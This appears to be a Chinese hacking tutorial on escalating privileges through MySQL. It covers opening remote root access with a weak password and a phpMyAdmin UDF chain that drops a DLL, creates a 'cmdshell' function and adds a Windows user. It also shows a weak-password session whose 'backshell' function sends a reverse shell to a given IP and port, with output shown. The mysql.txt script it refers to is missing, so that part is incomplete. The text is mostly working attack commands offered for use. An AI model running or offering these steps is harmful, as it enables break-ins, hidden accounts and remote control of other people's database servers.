mysql默認狀態下是不開放對外訪問功能的
1、如何設置才能允許外網訪問MySQL
使用“mysql -uroot -proot”命令可以連接到本地的mysql服務;
使用“use mysql”命令,選擇要使用的數據庫,修改遠程連接的基本信息,保存在mysql數據庫中,因此使用mysql數據庫;
使用“GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'root' WITH GRANT OPTION;”命令可以更改遠程連接的設置;
使用“flush privileges;”命令刷新剛才修改的權限,使其生效;
使用“select host,user from user;”查看修改是否成功
2、phpmyadmin 連入提權
select @@basedir; //Mysql安裝目錄 C:/phpStudy/MySQL/ CREATE TABLE udftest(udf BLOB); INSERT into udftest values (CONVERT(,CHAR));CONVERT(這里換成你的UDF的HEX編碼,CHAR)); SELECT udf FROM udftest INTO DUMPFILE 'C:\\phpStudy\\MySQL\\lib\\plugin\\udf.dll';-- select 'It is dll' into dumpfile 'C:\\phpStudy\\MySQL\\lib\\plugin::$INDEX_ALLOCATION'; DROP TABLE udftest; create function cmdshell returns string soname 'udf.dll' select cmdshell('net user xiaozi xiaozi /add');
參考鏈接: phpmyadmin直接提權 http://www.hack80.com/forum.php?mod=viewthread&tid=1304
通過phpmyadmin各種技巧拿webshell https://www.exehack.net/99.html
3、mysql弱口令(反彈端口連接提權)
假如我們掃到了一個mysql的root弱密碼,並且可以外連,但是服務器上面的網站又無法Getshell,這時我們怎么辦呢?
1、利用mysql客戶端工具連接mysql服務器,然后執行下面的操作。
實驗環境:phpStudy 默認安裝的mysql數據庫 5.5.40版本
C:\APMServ5\APMServ5.2.6\MySQL5.1\bin>mysql.exe -h 192.168.106.141 -u root -p
Enter password: ****
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 11
Server version: 5.5.40 MySQL Community Server (GPL)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> \. c:\mysql.txt
Database changed
Query OK, 0 rows affected (0.02 sec)
Query OK, 0 rows affected (0.06 sec)
Query OK, 1 row affected (0.01 sec)
Query OK, 1 row affected (0.00 sec)
Rows matched: 1 Changed: 1 Warnings: 0
Query OK, 1 row affected (0.00 sec)
Query OK, 0 rows affected (0.09 sec)
+-------------------------------------------------------+
| backshell('') |
+-------------------------------------------------------+
| 反彈shell.
例:select backshell("your IP",your port); |
+-------------------------------------------------------+
1 row in set (0.00 sec)
mysql> select backshell("192.168.106.137",2010);
+-----------------------------------+
| backshell("192.168.106.137",2010) |
+-----------------------------------+
| 執行成功
|
+-----------------------------------+
1 row in set (0.02 sec)
mysql> select backshell("192.168.106.137",2010);
+-----------------------------------------+
| backshell("192.168.106.137",2010) |
+-----------------------------------------+
| 創建臨時文件出錯,backshell無法繼續運行. |
+-----------------------------------------+
1 row in set (0.02 sec)
mysql> select @@version
-> ;
+-----------+
| @@version |
+-----------+
| 5.5.40 |
+-----------+
1 row in set (0.00 sec)
mysql>
mysql.txt:
復制以上內容保存為mysql.txt即可。
參考文章:
mysql利用ntfs的ADS創建文件夾 http://blog.csdn.net/yiyefangzhou24/article/details/17190135
MYSQL提權總結 http://www.waitalone.cn/mysql-tiquan-summary.html?replytocom=390